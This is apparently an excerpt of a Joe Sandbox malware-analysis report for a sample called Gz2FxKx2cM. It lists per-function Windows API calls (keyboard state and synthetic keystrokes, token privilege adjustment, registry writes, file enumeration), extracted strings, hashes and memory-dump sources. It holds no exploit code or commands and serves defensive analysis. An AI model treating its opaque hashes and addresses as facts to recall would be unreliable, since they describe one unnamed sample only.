                                          • Instruction ID: 7d46b4cfd2ece717c4462bd7ea75c481eea8360a413bde1cd11f56245b01502f
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 0BE0E67494010EDFDB00EFB4D54969E7FB4EF04301F104561FD01D2281DA309D509A62
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0098CB37
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098CB95
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098CBD6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098CC00
                                          • SendMessageW.USER32 ref: 0098CC29
                                          • _wcsncpy.LIBCMT ref: 0098CC95
                                          • GetKeyState.USER32(00000011), ref: 0098CCB6
                                          • GetKeyState.USER32(00000009), ref: 0098CCC3
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098CCD9
                                          • GetKeyState.USER32(00000010), ref: 0098CCE3
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098CD0C
                                          • SendMessageW.USER32 ref: 0098CD33
                                          • SendMessageW.USER32(?,00001030,?,0098B348), ref: 0098CE37
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0098CE4D
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0098CE60
                                          • SetCapture.USER32(?), ref: 0098CE69
                                          • ClientToScreen.USER32(?,?), ref: 0098CECE
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0098CEDB
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0098CEF5
                                          • ReleaseCapture.USER32 ref: 0098CF00
                                          • GetCursorPos.USER32(?), ref: 0098CF3A
                                          • ScreenToClient.USER32(?,?), ref: 0098CF47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098CFA3
                                          • SendMessageW.USER32 ref: 0098CFD1
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098D00E
                                          • SendMessageW.USER32 ref: 0098D03D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0098D05E
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0098D06D
                                          • GetCursorPos.USER32(?), ref: 0098D08D
                                          • ScreenToClient.USER32(?,?), ref: 0098D09A
                                          • GetParent.USER32(?), ref: 0098D0BA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098D123
                                          • SendMessageW.USER32 ref: 0098D154
                                          • ClientToScreen.USER32(?,?), ref: 0098D1B2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0098D1E2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098D20C
                                          • SendMessageW.USER32 ref: 0098D22F
                                          • ClientToScreen.USER32(?,?), ref: 0098D281
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0098D2B5
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098D351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3977979337-4164748364
                                          • Opcode ID: 7251ac33155cb1a764b17db0aa69c52ec2243566a070f2af3630053b58e062f6
                                          • Instruction ID: e27a87c4e31e8e85d8eaa1fb8dbdb9b52c214627a37d7ddd3540c4b087d3d8f3
                                          • Opcode Fuzzy Hash: 7251ac33155cb1a764b17db0aa69c52ec2243566a070f2af3630053b58e062f6
                                          • Instruction Fuzzy Hash: AD42AFB4618641AFD724EF24D848F6ABBE9FF48314F140A19F599873B1D731E840EB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-1798697756
                                          • Opcode ID: 12d1bd2bda7d416134d11d0723eaec3b76e3e1007ad1d981cac5a70aadc79497
                                          • Instruction ID: f901e344a0dec507725542041a2961841f263e5fe783aa395139ec72ec89ae85
                                          • Opcode Fuzzy Hash: 12d1bd2bda7d416134d11d0723eaec3b76e3e1007ad1d981cac5a70aadc79497
                                          • Instruction Fuzzy Hash: 3A93B371E0421ADBDB24CFA9C881BEDB7B5FF48311F24856AED45AB280E7749D85CB40
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 009048DF
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093D665
                                          • IsIconic.USER32(?), ref: 0093D66E
                                          • ShowWindow.USER32(?,00000009), ref: 0093D67B
                                          • SetForegroundWindow.USER32(?), ref: 0093D685
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093D69B
                                          • GetCurrentThreadId.KERNEL32 ref: 0093D6A2
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0093D6AE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093D6BF
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093D6C7
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0093D6CF
                                          • SetForegroundWindow.USER32(?), ref: 0093D6D2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D6E7
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D6F2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D6FC
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D701
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D70A
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D70F
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093D719
                                          • keybd_event.USER32(00000012,00000000), ref: 0093D71E
                                          • SetForegroundWindow.USER32(?), ref: 0093D721
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0093D748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 1142becbf1fcfa0616faeb4a15a0906f5b4083651b6e3986e9c34700111a088d
                                          • Instruction ID: 2f323559c9498fac459ff834ea04fba9114b2985797be5d6e654b42b0b697c45
                                          • Opcode Fuzzy Hash: 1142becbf1fcfa0616faeb4a15a0906f5b4083651b6e3986e9c34700111a088d
                                          • Instruction Fuzzy Hash: ED319271A50318BAEB202B619C5AF7F3E6CEB44B50F104025FA05EA2D1D6B05D10BFA0
                                          APIs
                                            • Part of subcall function 009587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                            • Part of subcall function 009587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                            • Part of subcall function 009587E1: GetLastError.KERNEL32 ref: 00958865
                                          • _memset.LIBCMT ref: 00958353
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009583A5
                                          • CloseHandle.KERNEL32(?), ref: 009583B6
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009583CD
                                          • GetProcessWindowStation.USER32 ref: 009583E6
                                          • SetProcessWindowStation.USER32(00000000), ref: 009583F0
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0095840A
                                            • Part of subcall function 009581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00958309), ref: 009581E0
                                            • Part of subcall function 009581CB: CloseHandle.KERNEL32(?,?,00958309), ref: 009581F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 16e71f4b981f703900abc07283ba234ca5538263ce5df1136b87f84ef72e0069
                                          • Instruction ID: f5dbc7ea94ea43d9c875b6e34d3344c38a138bdb2e6c37e1f37673e34aa0f813
                                          • Opcode Fuzzy Hash: 16e71f4b981f703900abc07283ba234ca5538263ce5df1136b87f84ef72e0069
                                          • Instruction Fuzzy Hash: 228148B1904209AFDF11DFA5DC45AEFBBB8EF08305F1441A9FD14B6261EB318A19DB20
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096C78D
                                          • FindClose.KERNEL32(00000000), ref: 0096C7E1
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096C806
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0096C81D
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0096C844
                                          • __swprintf.LIBCMT ref: 0096C890
                                          • __swprintf.LIBCMT ref: 0096C8D3
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • __swprintf.LIBCMT ref: 0096C927
                                            • Part of subcall function 00923698: __woutput_l.LIBCMT ref: 009236F1
                                          • __swprintf.LIBCMT ref: 0096C975
                                            • Part of subcall function 00923698: __flsbuf.LIBCMT ref: 00923713
                                            • Part of subcall function 00923698: __flsbuf.LIBCMT ref: 0092372B
                                          • __swprintf.LIBCMT ref: 0096C9C4
                                          • __swprintf.LIBCMT ref: 0096CA13
                                          • __swprintf.LIBCMT ref: 0096CA62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: ecf9060ae3c84c6c2d6f755996b5f9b5f5f20b6b64c6108eb310228c5f6dba73
                                          • Instruction ID: f35fc0548e5c343573b155c3ede5040dea1b9c9c35b01f79dd9922e23e60f9fe
                                          • Opcode Fuzzy Hash: ecf9060ae3c84c6c2d6f755996b5f9b5f5f20b6b64c6108eb310228c5f6dba73
                                          • Instruction Fuzzy Hash: 12A1FFB1508244AFC710EF94D886EAFB7ECEFD4704F40491AF59586292EA34DA08CB62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0096EFB6
                                          • _wcscmp.LIBCMT ref: 0096EFCB
                                          • _wcscmp.LIBCMT ref: 0096EFE2
                                          • GetFileAttributesW.KERNEL32(?), ref: 0096EFF4
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0096F00E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096F026
                                          • FindClose.KERNEL32(00000000), ref: 0096F031
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0096F04D
                                          • _wcscmp.LIBCMT ref: 0096F074
                                          • _wcscmp.LIBCMT ref: 0096F08B
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096F09D
                                          • SetCurrentDirectoryW.KERNEL32(009B8920), ref: 0096F0BB
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096F0C5
                                          • FindClose.KERNEL32(00000000), ref: 0096F0D2
                                          • FindClose.KERNEL32(00000000), ref: 0096F0E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 04fc0c8a4b042bd9bdb2400dde40ab518ea29ea75cc43cd1939e9497138f99c9
                                          • Instruction ID: 27e2ea26ba4ccbc3c6b0da978881a713932746e894ce2098f3316bedd61f4f3f
                                          • Opcode Fuzzy Hash: 04fc0c8a4b042bd9bdb2400dde40ab518ea29ea75cc43cd1939e9497138f99c9
                                          • Instruction Fuzzy Hash: FD31FF325042186BDF14EFB4EC68EEE77AC9F88360F104176F818E21A1DB74DA84DB61
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00980953
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0098F910,00000000,?,00000000,?,?), ref: 009809C1
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00980A09
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00980A92
                                          • RegCloseKey.ADVAPI32(?), ref: 00980DB2
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00980DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: aaa00d5b734714ced5f027e09af0110bf9ccc03a6911f1df9975fc02bb2bb8ac
                                          • Instruction ID: 9d4d712bc9636f8361a4a867087a646e74ba5a2a0d193d5e9f17ba1f5e4de334
                                          • Opcode Fuzzy Hash: aaa00d5b734714ced5f027e09af0110bf9ccc03a6911f1df9975fc02bb2bb8ac
                                          • Instruction Fuzzy Hash: 4E0236756046119FCB54EF24D851E2AB7E9FFC9724F048858F89A9B3A2CB30EC45CB81
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0096F113
                                          • _wcscmp.LIBCMT ref: 0096F128
                                          • _wcscmp.LIBCMT ref: 0096F13F
                                            • Part of subcall function 00964385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009643A0
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096F16E
                                          • FindClose.KERNEL32(00000000), ref: 0096F179
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0096F195
                                          • _wcscmp.LIBCMT ref: 0096F1BC
                                          • _wcscmp.LIBCMT ref: 0096F1D3
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096F1E5
                                          • SetCurrentDirectoryW.KERNEL32(009B8920), ref: 0096F203
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096F20D
                                          • FindClose.KERNEL32(00000000), ref: 0096F21A
                                          • FindClose.KERNEL32(00000000), ref: 0096F22C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 076087c5b8f37689ddbff7c17cca7aa91074666c3e0973214ab8937583ef4358
                                          • Instruction ID: 861c164abe69e059e2ab5aeaa35770e6ab452bb12a6f0e12456f79ca49472471
                                          • Opcode Fuzzy Hash: 076087c5b8f37689ddbff7c17cca7aa91074666c3e0973214ab8937583ef4358
                                          • Instruction Fuzzy Hash: 9831C0365042196ADF24AEA4FC79EEE77AC9F893A4F100171E914E21A0DB30DA45DF64
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0096A20F
                                          • __swprintf.LIBCMT ref: 0096A231
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096A26E
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096A293
                                          • _memset.LIBCMT ref: 0096A2B2
                                          • _wcsncpy.LIBCMT ref: 0096A2EE
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0096A323
                                          • CloseHandle.KERNEL32(00000000), ref: 0096A32E
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0096A337
                                          • CloseHandle.KERNEL32(00000000), ref: 0096A341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 6d411211d874a9c6260a87f1bb2a1877665144a7bfd562f5571f2ddb19f17147
                                          • Instruction ID: b3d815b42a733262737e9ffbf6d5be560dcd20761d37befd4cd9bd468818f5dc
                                          • Opcode Fuzzy Hash: 6d411211d874a9c6260a87f1bb2a1877665144a7bfd562f5571f2ddb19f17147
                                          • Instruction Fuzzy Hash: C131C5B190411AABDB21DFA0DC49FEB77BCEF89740F1041B6F518E6260EB7496448F25
                                          APIs
                                            • Part of subcall function 00958202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0095821E
                                            • Part of subcall function 00958202: GetLastError.KERNEL32(?,00957CE2,?,?,?), ref: 00958228
                                            • Part of subcall function 00958202: GetProcessHeap.KERNEL32(00000008,?,?,00957CE2,?,?,?), ref: 00958237
                                            • Part of subcall function 00958202: HeapAlloc.KERNEL32(00000000,?,00957CE2,?,?,?), ref: 0095823E
                                            • Part of subcall function 00958202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00958255
                                            • Part of subcall function 0095829F: GetProcessHeap.KERNEL32(00000008,00957CF8,00000000,00000000,?,00957CF8,?), ref: 009582AB
                                            • Part of subcall function 0095829F: HeapAlloc.KERNEL32(00000000,?,00957CF8,?), ref: 009582B2
                                            • Part of subcall function 0095829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00957CF8,?), ref: 009582C3
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00957D13
                                          • _memset.LIBCMT ref: 00957D28
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00957D47
                                          • GetLengthSid.ADVAPI32(?), ref: 00957D58
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00957D95
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00957DB1
                                          • GetLengthSid.ADVAPI32(?), ref: 00957DCE
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00957DDD
                                          • HeapAlloc.KERNEL32(00000000), ref: 00957DE4
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00957E05
                                          • CopySid.ADVAPI32(00000000), ref: 00957E0C
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00957E3D
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00957E63
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00957E77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 38f65c64034c8c3aff90314adcb7cfa860280e19c18e230cf2c23579230a8b18
                                          • Instruction ID: a1e20d369a8a20f1cba67d7ec52c6365c29e0d87bb37adfa5944f8d704fb5caf
                                          • Opcode Fuzzy Hash: 38f65c64034c8c3aff90314adcb7cfa860280e19c18e230cf2c23579230a8b18
                                          • Instruction Fuzzy Hash: A6615B71904209AFDF00DFA6EC85AEEBB79FF44301F148169F815E62A1DB319E09DB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-4052911093
                                          • Opcode ID: ff2a2a0698ed95be107e8c0df3db0dc0d444bcaa02e1e64899d7194a7465bcc6
                                          • Instruction ID: 46bff916793b5ca461d56dc97a6a8dd2ca66a7e364eb7018c03edb5de2fe02e9
                                          • Opcode Fuzzy Hash: ff2a2a0698ed95be107e8c0df3db0dc0d444bcaa02e1e64899d7194a7465bcc6
                                          • Instruction Fuzzy Hash: 1E728D75E04219DBDB24CF59C8807EEB7B5FF48310F14816AE959EB290EB349E85CB90
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00960097
                                          • SetKeyboardState.USER32(?), ref: 00960102
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00960122
                                          • GetKeyState.USER32(000000A0), ref: 00960139
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00960168
                                          • GetKeyState.USER32(000000A1), ref: 00960179
                                          • GetAsyncKeyState.USER32(00000011), ref: 009601A5
                                          • GetKeyState.USER32(00000011), ref: 009601B3
                                          • GetAsyncKeyState.USER32(00000012), ref: 009601DC
                                          • GetKeyState.USER32(00000012), ref: 009601EA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00960213
                                          • GetKeyState.USER32(0000005B), ref: 00960221
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
